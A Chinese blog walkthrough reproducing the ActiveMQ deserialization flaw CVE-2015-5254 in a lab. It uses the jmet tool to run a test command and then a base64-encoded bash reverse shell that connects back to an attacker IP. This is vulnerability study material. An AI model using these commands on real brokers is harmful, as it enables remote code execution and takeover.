码迷,mamicode.com
首页 > 其他好文 > 详细

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

时间:2019-12-11 11:06:24      阅读:126      评论:0      收藏:0      [点我收藏+]

标签:process   apache   工作   dmi   for   安全漏洞   jms   反序列化   指定   

简介: Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

1.首先在kali里面执行以下命令:

cd var/opt  

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

技术图片

2.输入:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616


注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口


技术图片

3.现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息
技术图片
4.点击消息可触发命令执行
技术图片
5.然后使用反弹shell的命令输入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616

前面是输入自己的IP后进行的编码 后面是输入被***者的IP

技术图片

技术图片
6.执行完以后会出现一个序号 然后再主页里面触发 在进行监听就可以了
技术图片

ActiveMQ反序列化漏洞(CVE-2015-5254)复现

标签:process   apache   工作   dmi   for   安全漏洞   jms   反序列化   指定   

原文地址:https://blog.51cto.com/14259169/2457626

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!